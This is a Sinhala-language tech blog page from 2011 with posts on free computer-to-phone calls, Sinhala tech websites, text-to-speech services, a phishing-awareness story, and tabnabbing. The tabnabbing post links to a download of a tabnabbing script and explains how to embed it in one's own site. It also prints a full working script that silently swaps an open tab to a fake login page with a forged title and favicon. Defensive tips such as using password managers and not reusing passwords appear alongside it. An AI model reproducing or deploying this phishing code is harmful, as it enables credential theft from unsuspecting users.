Ads 468x60px

Sport News

Visitors

පහත ඇති "Like" Button එක ක්ලික් කර ඔබත් අදම අපේ Facebook Fan කෙනෙකු වන්න

Powered By Tricks Lanka

Comments

Sunday, July 17, 2011

නොමිලෙ පරිගනකයෙන් දුරකතනයට අමතන්න

ඔබගෙ  පරිගනකයෙ ස්ථාපනය කර  තිබෙන Yahoo messenger නැතහොත් Skype මෘදුකාංගය විවෘත කර ඔබගෙ ගිණුමට ලොග් වි  +18003733411 නැමති දුරකථන අංකයට අමතන්න. 

අමතා පට්ගත කිරිම අවසන් වු පසු FREE CALLS  ලබා දෙන්න. බිප් හඩට පසුව  “Please dial the phone number country code first, don’t forget to dial 1 for north America”
යන්න කියනු ඇත. ඉන්පසු ඔබගෙ කට හඩින් ඔබ ඇමතිය යුතු රට සහ දුරකතන අංකය ලබා දෙන්න.
(e.g. for north America it’s 1 and for India it’s 91)
ඔබට විනාඩි 7 ක කාලයක් ලැබෙනු ඇත. When it gets disconnected, repeat the same procedure again.
කමෙන්ට් එකකුත් දාලා යන්න

Thursday, July 14, 2011

ඔබට වැදගත් වන වෙබ් අඩවි-2, සිංහල තාක්ෂණික වෙබ් අඩවි

ආ , කට්ටිය කොහොමද  ඉතින් ??? සැප දුක ........... මම නම් මේ දවස්වල අවුලක් නෑ . අද නම් මම කියන්න යන්නේ අපේ සිංහල භාශාවෙන් පරිගනක ගැන , කිසිදු මුල්‍යමය තත්වයක් බලාපොරොත්තු නොවි තමන්ගේ කාලය වැය කරමින් රටට මහගු සෙවයක් කරන වෙබ් අඩවි කිහිපයක් ගැන . මට මේ ලිපිය ලියන්න ගොඩක්ම හේතු වුනේ අපේ ගොඩක් කට්ටිය කියන දෙයක් තමා සිංහලෙන් තාක්ෂණික ලිපි තිබුන නම් මරේ මරු කියලා , ඒ වුනත් ගොඩක් අය දන්නේ නෑ , මෙහෙම සිංහලෙන් තාක්ෂණික ලිපි පලකරන වෙබ් අඩවි තියනවා කියලා...... ; මගේ ගොඩක් යාලුවොත් කියුවාම තමා දන්නේ  සිංහලෙන් තාක්ෂණික ලිපි පලකරන වෙබ් අඩවි තියනවා කියලා !!! ( ජංජාලය තියන එවුන් පොල්ගානවද දන්නේ නැ මෙවා නොදැන ඉන්න .... :P ).

හරි හරි වැඩි කතා ඕනේ නෑ , මම වෙබ් අඩවි ටික කියලා දාන්නම් කෝ!!!! (මෙතැන ඉතින් මහා ලොකු වෙබ් අඩවි ගණනක් නෑ , දන්න 3 න තමා ; තව වෙබ් අඩවි තියෙනවා නම් කියන්න හොදේ , ඒවා දැම්මේ නැති උනාට තරහා වෙන්න එපා හොදේ ) .

1. Gurulk.com


    *  Basic Computing
    * Windows XP
    * Windows Vista
    * Ubuntu - Linux
    * Microsoft Word 2003
    * Microsoft Word 2007
    * Microsoft Excel
    * Microsoft Access
    * Microsoft Powerpoint
    * Adobe Photoshop
    * Adobe Flash
    * 3DStudioMax
    * Flash ActionScripting
    * Adobe Dreamweaver
    * Adobe Fireworks
    * Adobe AfterEffects
    * Java
    * JavaScript
    * C
    * C++
    * PHP
    * HTML
    * Visual Basic.NET 2003
    * Visual Basic.NET 2005
    * Visual Basic 6.0
    * Facebook
    * Joomla
    * Networking
සහ තවත් බොහ්හෝ දේ .........



                                         - උපුටා ගැනිම gurulk.com වෙතින් . -






" Kuppiya.com offers you free learning videos regarding most aspects of the IT world. We are happy to say that we are the pioneers in introducing IT learning videos in Sinhala to Sri Lanka.
This site is totally free to use. We are in a mission to empower the people of Sri Lanka to increase their knowledge of the IT world.
All videos in this site are in Sinhala, So any Sri Lankan can easily understand them. "

                                                                                                  - උපුටා ගැනිම Kuppiya.com වෙතින් -


" Techකතා සජීවීව!
සෑම බ්‍රහස්පතින්දාම රෑ9:00 සිට අපේ podcast එක සමග සජීවීව එකතුවන්න!
techkatha.com/chat/පටිගත කරන වෙලාවන් හා වෙනත් Techකතා updates සදහා add ලෙස type කොට 0714712774 වෙත SMS කරන්න. "






techkatha.com නැතහොත් Techකතා යනු ඕනෑම ආකාරයේ තාක්ෂණික ගැටළුවක් සඳහා පිළිතුරු සපයා දෙන, තාක්ෂණික පුවත් හා නව සොයාගැනීම් පිළිබඳව හෙළිදරව් කරන පොඩ්කාස්ටින් (Podcasting) හා සිංහල බ්ලොග් මුසුවක් ලෙස පරිශීලකයින් වෙත එන වෙබ් අඩවියකි. බ්ලොග් රේඩියෝවක් ලෙසද එය හැඳින්විය හැකිය.


පරිගණක ආශ්‍රිතව වේවා අන්තර්ජාල පරිශීලනයේදී වේවා, මෘදුකාංග හෝ දෘඩාංග භාවිතය සම්බන්ධයෙන් පැන නගින ගැටළු, ජංගම දුරකථනය, රූපවාහිනිය මෙන්ම නව සන්නිවේදන ක්‍රමෝපායයන් හි පවතින ගැටළු මේ ආකාර බහුවිධ තාක්ෂණ ගැටළුවලින් වත්මන් සමාජයේ විවිධ පිරිස් පෙළෙන බව නොරහසකි. ඇතැමුන් දන්නා බව පෙන්වමින් තවත් අය මුලාවේ හෙළන අතර, නිවැරදි අවබෝධයක් දැක්මක් ලබා ගත නොහැකිවීමෙන් ‍බොහෝ දෙනා තාක්ෂණයෙන් උපරිම ඵල නෙලාගැනීමට නොහැකිව පසුවෙති. අක්‍රමවත් පාඨමාලා හා ලිපි ලේඛන ආශ්‍රයෙන් අසම්පූර්ණ දැනුමක් අසංවිධිත ලෙස සමාජයට ගලා ඒමේ ප්‍රවණතාව බහුල සමයක අපි සිටිමු. Techකතා බිහි වන්නේ තමන්ගේ දැනුම අන් යහපත සඳහා යෙදවීමේ අවශ්‍යතාව ප්‍රබලව දැනුණු එවන් මොහොතක ඇතිවුණු සාකච්ඡාවක ප්‍රතිඵලයක් ලෙසිනි.
කාලිංග ඇතුළත්මුදලි, බුද්ධික ජයසිංහ, තිළිණ ගුණසේකර හා හර්ෂදේව ආරියසිංහ ටෙක් කතා ආරම්භ කිරීමේ නියමුවෝ වෙති. ඔවුන්ගේ ආරාධනයෙන් මලින්ත සමරකෝන් (Twitter) සිය සහය මෙම වැඩ පිළිවෙල වෙත ලබා දෙයි.
කාලිංග ඇතුළත්මුදලි (Twitter) – ජාලකරණය පිළිබඳ වසර 12ක ‍ප්‍රවීණත්වයක් දරයි. ගුවන් විදුලි සන්නිවේදනය සම්බන්ධ වඩාත් උනන්දුවක් දක්වන, ඒ ආශ්‍රිත වැඩ මුළු හා වැඩසටහන් සඳහා සහභාගී වන අතර, Techකතා හි ද ප්‍රධානත්වය ගෙන ක්‍රියා කරයි.
බුද්ධික ජයසිංහ (Twitter) – වෘත්තියෙන් මෘදුකාංග සැලසුම් ශිල්පියෙකු ලෙස කටයුතු කරයි. තොරතුරු තාක්ෂණ ක්ෂේත්‍රයේ වසර 07 ක පලපුරුද්ද හා ජංගම දුරකථන මෘදුකාංග සංවර්ධනයේ සිව් වසරක අත්දැකීම් සහිත වන අතර Mobile Computing/Technologies, Embedded Systems, Software Localization පිළිබඳව වඩාත් රුචියක් දක්වයි.
තිළිණ ගුණසේකර (Twitter) -  වෙබ් වැඩසටහන් නිර්මාණකරණයේ නියැලී සිටියි. පරිගණක ක්‍රීඩා කණ්ඩායමක සාමාජිකයෙකි.
හර්ෂදේව ආරියසිංහ (Twitter) - වෘත්තියෙන් මෘදුකාංග ඉංජිනේරුවෙක් ලෙස කටයුතු කරයි. තොරතුරු තාක්ෂණ සංවර්ධන හා තොරතුරු තාක්ෂණ අධ්‍යාපන ක්ෂේත්‍රයන්හි වසර 5 ක පලපුරුද්දක් සහිත වන අතර Web Technologies සහ Computer Music Production පිළිබඳව වැඩි උනන්දුවක් දක්වයි. පරිගණක ක්‍රීඩා කණ්ඩායමක සාමාජිකයෙකුද වේ.
මේ සුසංයෝගයෙන් බිහි වූ Techකතා එහි ආරම්භයේ පටන්ම අධ්‍යාපනික කේෂ්ත්‍රවල  විද්‍යාර්ථීන්, ආචාර්යවරුන් සහ වෙනත් සාමාන්‍ය ජීවිතයේදී මෙන්ම වෘත්තීය කටයුතුවලදී තාක්ෂණික ගැටළුවලට මුහුණ දෙන සෑම වයස් කාණ්ඩයකම සියලුම දෙනාටම විවෘත වු අත්දැකීමක් වීම විශේෂත්වයකි.
වෙබ් අඩවියට එක් කරන ලද මුල් වැඩසටහන් සතියකට වරක් පටිගත කර පරිශීලකයින් හට ලබා දුන් අතර, මාස කිහිපයක් ගතවීමේදී වෙබ් අඩවිය මගින් දියත් කළ චැට් කාමරයක් තුළට සජීවී අත්දැකීමක් ලබා දෙමින් සාකච්ඡාව සිදුවන මොහොතෙහිම විකාශය ද සිදු කරන්නට කණ්ඩායම කටයුතු කළහ.
Techකතාවල විශේෂත්වය ‍වන්නේ එය සෑම සියලු ආකාරයකින්ම මිත්‍රශීලී ලෙස පරිශීලකයා වෙත ළඟා වීමට කටයුතු කර තිබීමයි. නිදසුන් දක්වතොත් Techකතා වෙත ප්‍රශ්න යොමු කිරීමේදී ස්කයිප් (techkatha) ඇමතුම් වැනි පණිවිඩ ක්‍රමවේද හරහා මෙන්ම,  Techකතා වෙබ් අඩවියේ ඇති ආකෘති පත්‍රය පිරවීම මගින්, දුරකථනය මගින්, විද්‍යුත් තැපෑලෙන් (info [at] techkatha.com) ද ‍නැතිනම් සජීවී පටිගත කිරිම සුදුවන සෑම බ්‍රහස්පතින්දාවකම සවස 9.00 සිට Techකතා චැට් කාමරය හරහා යන ඕනෑම ආකාරයකින් කෙනෙකුට සිය ගැටළු ඉදිරිපත් කළ හැකිය. එහි අනෙක් විශේෂත්වය වන්නේ යුනිකෝඩ් සිංහල භාවිතයෙන්, ඉංග්‍රීසියෙන් හෝ සිංග්‍රීසියෙන් සිය ගැටළු ඉදිරිපත් කළ හැකිවීමයි. භාෂා බාධකය නොතකා හරිමින් සෑම තරාතිරමකම ඕනෑම අයෙකුට නවීන තාක්ෂණයේ දොරගුළු විවර කර දීම කණ්ඩායමේ අරමුණ වන හෙයිනි. එමෙන්ම Techකතා පටිගත කරන ලද වැඩසටහන්, ඉතා අඩු ගුණාත්මක අන්තර්ජාල සබඳතා සඳහා වෙනමම හා පුළුල් පරාස අන්තර්ජාල ‍සේවා භාවිත කරන්නන් සඳහා වෙනමම වශයෙන් වැඩ සටහන් දෙකක් ලෙස ලබා දෙයි. තවද, පරිගණකයක් නැති අයෙකුට හෝ පරිගණකයක් නොමැති ස්ථානයකදී වුවද Techකතා ජංගම දුරකතන වෙබ් අඩවිය (http://m.techkatha.com) ඔස්සේද ජංගම දුරකතන මගින් සවන්දීමට ගැකිය. සමාජයේ සියලු දෙනාට සමීප විය හැකි වන සේ Techකතා ඉදිරිපත් කිරීම සඳහා කණ්ඩායම නිරන්තරයෙන් සිය අවධානය ‍ යොමු කර සිටී.
මේ සියල්ලටම වඩා වැදගත් වන්නේ Techකතා කණ්ඩායම කිසිදු මූල්‍යමය ලාභයක් අපේක්ෂාවකින් තොරව  සම්පූර්ණයෙන්ම නොමිලයේ සිදු කරන සේවාවක් වීමයි.


                                                                                                - උපුටා ගැනිම techkatha.com වෙතින් -

4. Digit.lk 

 

ඔබට වැදගත් වන වෙබ් අඩවි-1, බ්ලොග් කියවිම වෙනුවට වෙන එකෙකු ලවා එය කියවිම.

අද ටිකක් ගෙදරට වෙලා ඉන්න පොඩ්ඩක් කූල් එකේ ඉන්න නිසා හිතුනා පොස්ට් 3 - 4 විතර ලියන්න . කරපු හැකින් (හැකින් කියන්නත් බෑ , script kiddies වගේ soal)විඩියෝ tutorials ටිකකුත් තියනවා දාන්න ..... මේ ටිකේ ජංජාලය බකල් ගැහුව නිසා මුකුත්ම අප්ලෝඩ් කරගන්නත් බැරිවුණා soal. හරි හරි වැල් වටාරන් ඇති , මාතෘකාවට එමුකෝ ! මම අද කිය්න්න යන්නේ ජංජාලයේ තියන අපුරු සේවාවක් ගැන . "Text-to-Speech - (TTS)" , ගොඩක් දන්නවාත් ඇති මේක ගැන . අපෝ ඉතින් මම දැන් අද කියන්න යන්නේ "Text-to-Speech - (TTS)" ගැන වැල්වටාරන් නම් නෙවෙයි ඕං , ඕකෙන් බ්ලොග් ලියන අපිට වාසි වන සේවාවක් ගැන .garupale

මේක ගැන කථාකරනවා නම් මේ සේවාවෙන් කරන්නේ අපි පොස්ට් එකක දාන වචන පෙළගස්වාගෙන ශබ්ද නඟා කියවිමයි (අපි පොඩි කාලේ පොත් කියවනවා වගේ...... garupale) , සේවාව ලබාදෙන්නේ නම් අපේ පොස්ට් එක උඩින් හරි යටින් හරි පොඩි ප්ලේයර් කෑල්ලක් embed වෙලා තියනවා . ඉතින් කියවන එක්කෙනාට කරන්න තියන්නේ ඔය ප්ලේයර් එකේ play බොත්තම ඔබන්න , එතකොට පොස්ට් එකේ තියන ටික මොකෙක් හරි එකෙක් කියවගෙන යනවා , අපිට තියන්නේ ඕක අහගෙන ඉන්න එක විතරයි hah .හරි හරි වැඩි වර්ණනා නැතිව මම කියලා දාන්නම්කෝ , ඔය සේවාව ලබාදෙන වෙබ් අඩවි කිහිපයක් ගැනම . garupale


1. Odiogo.com

මේ අඩවිය ගැන කියනවා නම් ඉක්මණින්ම වචන ටික ඕඩියෝ එකක් බවට පත්කරන්න පුලුවන් . නමුත් free version එකට නම් දෙන්නේ microsoft වල ඉන්න sam ගේ කටහඬ වගේ ගොබ්බ කටහඬක් hah (කටහඬ මොකක් වුනත් අවුලක් නෑනේ කියවන එක ඇහේනවා නම්garupale) . ප්ලේයර් එකත් අවුලක් නැතුව ගැලපෙන්න සාදා ඇති නිසා තිම් එකට අවුලකුත් නෑ , එහෙනම් ඔයලත් දාගෙනම බලන්නකෝ ......... garupale .

* DEmo එකක් බලාගන්න මෙතෑන කොටන්න .


2. ispeech.org

මේකත් මරු වෙබ් අඩවිය , හැබැයි පෙර අඩවියට වඩා මනා පැහිදිලි කටහඬක් මෙහි ඇතුලත් වෙනවා hah , ඕඩියෝ rending වේගය තරමක් අවම වුවත් තත්පර කිහිපයක් ඇතුලදි අවශ්‍ය වැඩේ කරගත හැක . ඔයාලත් දාගෙනම ගුණ දොස් කියන්නකෝ ....... (DEmo එකක් වෙබ් අඩවියේ මුලම තිබේ .) hah


* තව වෙබ් අඩවි කිහිපයක්ම මට හම්බවුණා . හම්බ වුණ ඒවා වලින් අල්ලලා ගිය වෙබ් අඩවි 3 ක් විතර තියනවා , මම පොඩ්ඩක් වෙබ් අඩවි ටික ටෙස්ටින් පාරක් දාලා බලනකොට එක එක අවුල් ආවා garupale(ඔක්කොම ඒවා වල මම signup වුනේ 10min mail හරහා , විනාඩි 10 ක් විතර බලලා confirmation mail එකක් ආපු නැති නිසා වැඩේ අත ඇරලා දෑම්මා garupale [දැන් මේක මම ලියන්නේ හෙනම හදිස්සියෙන්, මොකද මම මේ දැන් මට ආසම කරන බයිස්කෝප් 3 ක් හම්බවුණා බලන්න. අද ටිකක් වැඩි වැඩක් නැති නිසා අනිවා 3 ම බලන්න ඕනේ!!!] garupale) . ඕන දෙයක් කරගන්න කියලා මම කොකටත් අනෙක් වෙබ් අඩවි ටික දෙන්නම් කෝ !!! ඔයාලා දාලා ටෙස්ට් කරලා මටත් කියන්නකෝ !!!......... garupale .













* වෙබ් අඩවි ටික බලලම ඕවා ගැන ගුණ දොස් පහළ කොමෙන්ට් බොක්ස් එකේම දාන්නකෝ !!! 

හැකින් වලින් ආරක්ෂා වෙන්න


ලගඳි මගේ යාලුවෙක්ගෙ ෆේස්බුක් ගිනුමක් හැක් වෙලා.මේක වෙලා තියෙන්නේ අපේ යාලුවා හොඳට දන්න කියනවිශ්වාසවන්තම ගැනු ලමෙක් එක්ක Facebook චැට් කර කර ඉන්නකොට.ගැනු ලමයා  කියලා ටිකකට ජීටොක් වලටඑන්න චැට් එකට.මේ ෆෙස්බුක් එකෙ ගොඩක් හායි කියනවා චැට් කරන්න අමාරුයි කියලා.එහෙම කියලා Gmail වලලින්ක් එක දීලා ෆේස්බුක් චැට් එකේ ජීටොල්ක් වලට එන්න කියලා..මේකටත් මොකද කෙල්ලෙක් චැට් කරනවනම්වෙන ලෝකයක් නැ.ෆේස්බුක් චැට් එකේ එවපු ජීටොක් ලින්ක් එක ක්ලික් කරලා කියපු පමාවට ජීමේල් ලොග්වෙලා.මෙහෙම ටික වෙලාවක් චැට් කර කර ඉඳලා ආයෙත් bye bs එහෙම කිව්වට පස්සේ ඉතින් අපේ යාලුවා ඊලඟදවසෙ ආයෙත් ෆේස්බුක් ලොග් වෙන්න බලනකොට ඒකට ලොග් වෙන්න බැරිලු.gmail ලොග් වෙන්නත්බැරිලු.කොහොමද වැඩේ?එකවුන්ට් දෙකටම ෂොට් එක හම්බ වෙලා.

හිතුන නේද කොහොමද කාටවත් පාස්වර්ඩ් එක දෙන්නෙ නැතුව කොහොමද එකවුන්ට්  එක හැක් උනේ කියලා? ජීටොල්ක් එකේ චැට් කරලා කොහොමද ෆෙස්බුක් එකේ එකවුන්ට් එකත් හැක් උනේ කියලා.ඒ වගේම හිතුන නේදවිශ්වාසවන්ත ගැනු ලමෙක් වෙලත් කොහොමද එයා මේ එකවුන්ට් එක හැක් කලේ?

කියන්නම් කොහොමද මෙහෙම උනේ කියලා පිලිවෙලට.කාටවත් පාස්වර්ඩ් දෙන්නේ නැතුව එකවුන්ට් එක හැක්වෙලා තියෙන්නේ මේ ගැනු ලමයා දීල තියෙන්න ලින්ක් එකේ ඉන්ටෆේස් එක ජීමේල් වගේම පෙනුනට ඒ ලින්ක් එකඅදාල ජීමේල් වල ඇඩ්‍රස් එක නෙවෙයි.කෙල්ලෙක් එවපු නිසා හදිසියට මේකා අදාල යුසර් නේම් එක පාස්වර්ඩ් එකටයිප් කරල එකවුන්ට් එකට ලොග් වෙලා.මෙතනදි වෙලා තියෙන්නේ ගැනු ලමෙක් විදියට ලින්ක් එක එවපු කෙනාඑවලා තියෙන්නේ ඒ විදියටම බාහිර පෙනුම තියෙන්න හදපු වෙනත් ඇඩ්‍රස් එකක් තියන ලින්ක් එකක්.මේ විදියටපෙන්නුම් කරන වෙබ්සයිට් ව්ලට කියන්නේ පිශිං සයිට් කියලා.මේ දවස් වල මේ ක්‍රමයට හැක් කරන්න ගොඩක්දෙනෙක් පෙලඹිලා ඉන්න බව පේනවා.ගොඩක් වෙලාවට මෙහෙම ලින්ක් එකකට අදාලව අපි ටයිප් කරන අපේපාස්වර්ඩ් එක කෙලින්ම ටෙක්ස්ට් ෆයිල් එකකට ලියවෙන හරි නැත්නම් ඩේටා බේස් එකකට හරි යන විදියට තමා මේපිශිං සයිට් හදලා තියෙන්නේ.ඒ නිසා අපි පලවෙනි පාර අපේ යුසර් නේම් පාස්වර්ඩ් ටයිප් කරනකොට කවදාවත් අදාලඑකවුන්ට් එකට ලොග් වෙන්නේ නැ.ඊලඟ පාර තමයි හරියටම අපේ එකවුන්ට් එකට ලොග් වෙන්න පුලුවන්.ඔන්නඔහොමයි ඕක වෙන්නේ.

දෙවෙනි කාරනේ ඒ කියන්නේ කොහොමද ජීමේල් එකවුන්ට් එකෙන් චැට් කරලා ෆේස්බුක් එකත් හැක් උනේ?ඒක නම්අපේ යාලුවා බාවිතා කරලා තියෙන්නේ එකම පාස්වර්ඩ් ජීමේල් වලටත් ෆේස්බුක් වලටත්.එතකොට ඉතිං ෆෙස්බුක් එකහැක් වෙන එක අහන්නත් දෙයක්ද?

අන්තිම කාරනේ කොහොමද විශ්වාසවන්ත ගැනු ලමෙක් වෙලත් අපේ යාලුවව හැක් කලේ.ඒකට හේතුව ඒ ගැනුලමයගෙ එකවුන්ට් එක අපේ යාලුවට කලින් හැක් වෙලා.වෙන කෙනෙක් තමයි මේ ගැනු ලමයා විදියට මගේ යාලුවත්එක්ක චැට් කරලා තියෙන්නේ. විශ්වාසවන්තකමට අර ලින්ක් එක ක්ලික් කරලා තමයි මෙයා මේකෙන් ලොග් වෙලාතියෙන්නේ.

ඔන්න ඉතින් ඔයගොල්ලන්ටත් හැක් වෙන්න කලින් පෙර සූදානමට මේක ටිකක් වෙනස් විදියට ලියලා දැම්මා.දැන්කියන්නම් කොහොමද මේ විදියට හැක් වෙන එකෙන් ගැලවිලා ඉන්නේ කියලා.මූලිකම දේ තමයි කවුරු කොයි තරම්විශ්වාස උනත් හදිස්සියට ලින්ක් ක්ලික් කරලා එකවුන්ට් වලට ලොග් නොවී ඉන්න එක.හැම වෙලේම අදාල එකවුන්ට්එකට අන්තර්ජාල ලිපිනය ඇඩ්‍රස් බාර් එකේම ටයිප් කරලම එවට ලොග් වෙන්න.උදාහරනයක් විදියට ජීමේල් ලොග්වෙනවා නම්  https://www.gmail.com  විදියට ඇඩ්‍රස් බාර් එකේ ටයිප් කරලා ලොග් වෙන්න.ඒ වගේම ෆේස්බුක්එකේ නම් එක එක ගෲප් වලට ජොයින් වෙනකොට ඇඩ්‍රස් බාර් එකේ URL එක පිලිබදව ගොඩක් දුරට සැලකිලිමත්වෙන්න.
තවත් දෙයක් ඊමේල් ගිනුම් වලටයි ෆේස්බුක් වගේ එකවුන්ට් වලටයි එකම පාස්වර්ඩ් නම් යොදාගන්නඑපා.බැරිවෙලාවත් එක ගිනුමක් හැක් උනු ගමන් අනිත් එකවුන්ට් එකත් හැක් වෙන්න පුලුවන්කම වැඩියි.

මීට අමතරව පොදුවේ හැකිං වලින් බේරෙන්න Crack කරපු සොෆ්ට්වෙයාර් බාවිතයෙන් වැලකී ඉන්න එකත්,ඔබගේ antivirus එකයි anti-spyware නියමිත පරිදි යාවත්කාලීන කරන එකත් හුඟක් දුරට වැදගත්.මීට අමතරව පෙන් ඩ්‍රයිව්භාවිතා කරන්න කලින් Scan කරන්නත් හොඳින් මතක තියාගන්න.ඒ වගේම ඔබ පාවිච්චි කරන පරිගනකය හෝලැප්ටොප් එක භාහිර අයගෙ පාවිච්චියට ලබා නොදෙනවනම් තමා වඩාත් හොඳ. 

ඔන්න ඉතිං මම දන්න විදියට මේ දේවල් පැහැදිලි කලා.සමහරවිට වැරදි තියෙන්නත් පුලුවන්.එහෙම දෙයක්තියනවනම් දන්න කෙනෙක් නිවැරදි කරන්න.ඒ වගේම මේ විදියට හැකිං වලිං බේරිලා ඉන්න අනුගමනය කරන්න ක්‍රමතියනව නම් කමෙන්ට් එකක් විදියට එකතු කරන්නත් කියලා ඉල්ලනවා.

Wednesday, July 13, 2011

Tabnabbing - Phishing කලාවේ අලුත්ම පෙරලිය (*තවත් එක් හැකින් ක්‍රමයක්)

මෙකෙන් මුලිකවම කරන්නේ අපි web browser එක tab එකක් දාලා වෙබ් අඩවියකට ගියා කියමුකෝ , හිතන්න අපි ගිය වෙබ් අඩ්වියේ මෙම phishing එක සිදුවෙන script එකක් ඇතුලත් වෙනවා කියලා . දැන් අර මම open කරපු මුල්tab එක තියලා , තව tab කිහිපයක් උපයෝගි කරගෙන මගේ වැඩටික කරනවා . නමුත් මෙම වෙලාවේදි අර script එක ඇතුලත් වෙලා තිබ්බ වෙබ් අඩවිය වෙනත් වෙබ් අඩවියකට (හිතන්නකෝ බොරු yahoo , gmail , facebook login page එකකට කියලා) යනවා . නමුත් මම දන්නවා මම ඒ වෙලාවේ ඒ tab එක ඔපන් කරලා තිබ්බේ ඒක නිසා මම එහි URL එක බල බ්ල ඉන්නේ නෑ , කෙලින්ම මගේ අදාල විස්තර ටික ඇඳලා දානවා hah. එතකොට තමා අපිට කෙලවෙන්නේ . මට ඔය පැහැදිලි කිරිම් කරන්න හරි අමරුයි අප්පා , ඔයාලත පහත විඩියෝ දාලා බලන්නකෝ එතකොට තේරෙයි
A New Type of Phishing Attack from Aza Raskin on Vimeo.
garupale


දැන් තේරෙනවා නේද වැඩේ කොහොමද වෙන්නේ කියලා . මම source code එකත් බැලුවා , වැඩේ නම් සරල logic එකකට තමා වෙන්නේ . මට මෙතැන source code එක දාන්න බැ , virus guard වලින් අල්ලනවා virus කියලා , ඇත්ත කියුවොත් මේකේ විරුස් එකක් නෑ , වෙන්නේ අර ටැබ් ගොඩක් open වෙලා තියන වෙලාවට වෙබ් අඩ්විය වෙනස්වීම පමණි .මෙක හොයාගෙන තියන්නේ ඔය mac එක හොයාගත්ත මහත්තයාගේ පුතා (Aza Raskin) කියලා තමයි සඳහන් වෙන්නේ . ඔයාලත් එයාගේ බ්ලොග් එකට ගිහිල්ලා බලන්නකෝ .(http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ , ආ කියන්න අමතක වුනා මේ අඩ්වියට යන කොට මෙයා මේ බ්ලොග් එකේ script එක දාලා තියනවා අපිට demo එකක් වගේ පෙන්නන්න .ඒ වෙලාවට virus gurad එකෙන් අල්ලයි virus කියලා , ඒකට බයවෙන්න එපා හොඳේ !!).


ම්මත් මේ demo එකක් හැදුවා , ඒක ටිකකට කලින් delete කරලා ( free hosting නේ ) . ඔයාලට ඔයාලගේ වෙබ් අඩවියකට මෙය දාන්න ඕනෙම නම් කරන්න තියන්නේ මෙහි .js (javascript file එක) ඔයාලගේ web hosting service එකකට upoload කරලා , වෙබ් අඩ්වියේ <script>
tag එක මඟින් javascript එක කෝල් කිරිම පමනයි . garupale



script එක භාගත කරගන්න : http://bit.ly/da4qVT (http://www.azarask.in/projects/bgattack.js)

උදා : (දැනට මෙම script එක මෙහි නිර්මාතෘගේ වෙබ් අඩවියේ තියන නිසා මම මෙම script එක එහි සිට කොල් කරනවා) . පහත කේතය text file එකක දාලා " anyname.html" ලෙස save කරලා ඕක tab කිහිපයක් ඕපන් කරලා බලන්නකෝ . yoursite.com/phishing.javascript.js එක javascript එක තියන තැනට වෙනස් කරන්න . )

කේතය :


  1. <html><head> </head><body><h2> Testing tabnabbing </h2><script type="text/javascript" src="yoursite.com/phishing.javascript.js"></script> </body></html>  

තව ඕක ක්‍රමය වැඩිදියුණු කරලා , ඒ කියන්නේ tabnabbing සහ iframe භාවිතා කරලා ගේම දෙන විඩියෝ ඒකකුත් දැක්කා youtube එකේ .ඕං ඒකත පහත දාලා ඇති බලන්නකෝ , බලලා පහලින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!


විඩියෝ භාවිතා වු කේතය (tabnabbing & iframe) :

  1. <html><head><title></title></head><style type="text/css">html {overflow: auto;}html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}</style><body> <script type="text/javascript">//----------Set Script Options--------------var REAL_PAGE_URL = "http://google.com/"; //This is the "Real" page that is shown when the user first views this pagevar REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"var FAKE_PAGE_URL = "http://www.hackyeah.com"; //Set this to the url of the fake pagevar FAKE_PAGE_TITLE = "HackYeah"; //This sets the title of the fake pagevar REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.var FAKE_FAVICON = "http://www.hackyeah.com/favicon.ico"; //Set's the fake favicon.var TIME_TO_SWITCH_IE = "4000"; //Time before switch in IE (after tab changes).var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching (does not account for tab focus) .//---------------End Options-----------------var TIMER = null;var SWITCHED = "false"; //Find Browser Typevar BROWSER_TYPE = "";if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){ BROWSER_TYPE = "Internet Explorer";}//Set REAL_PAGE_TITLEREAL_PAGE_TITLEdocument.title=REAL_PAGE_TITLE; //Set FAVICONif(REAL_FAVICON){ var link = document.createElement('link'); link.type = 'image/x-icon'link.rel = 'shortcut icon'link.href = REAL_FAVICON; document.getElementsByTagName('head')[0].appendChild(link);} //Create our iframe (tabnab)var el_tabnab = document.createElement("iframe");el_tabnab.id="tabnab";el_tabnab.name="tabnab";document.body.appendChild(el_tabnab);el_tabnab.setAttribute('src', REAL_PAGE_URL); //Focus on the iframe (just in case the user doesn't click on it)el_tabnab.focus(); //Wait to nab the tab!if(BROWSER_TYPE=="Internet Explorer"){ //The tested versions of IE blur the iframe on tab change el_tabnab.onblur = function(){ TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE); } el_tabnab.onfocusfunction(){ if(TIMER) clearTimeout(TIMER); }} else { setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);} function TabNabIt(){ if(SWITCHED == "false"){ //Redirect the iframe to FAKE_PAGE_URL el_tabnab.src=FAKE_PAGE_URL; //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;  //Change the favicon -- This doesn't seem to work in IE if(BROWSER_TYPE != "Internet Explorer"){ var links = document.getElementsByTagName("head")[0].getElementsByTagName("link"); for (var i=0; i<links.length; i++) { var looplink = links[i]; if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") { document.getElementsByTagName("head")[0].removeChild(looplink); } } var link = document.createElement("link"); link.type = "image/x-icon"link.rel = "shortcut icon"link.href = FAKE_FAVICON; document.getElementsByTagName("head")[0].appendChild(link); } }}</script> </body></html>  

මේකෙන් බේරෙන්න තියන හොදම ක්‍රමය තමා browser එකේ password manager එකක් දාගෙන භාවිතා කිරිම . ඔය Secure login (https://addons.mozilla.org/en-US/firefox/addon/4429/)වගේ හොඳයි .garupale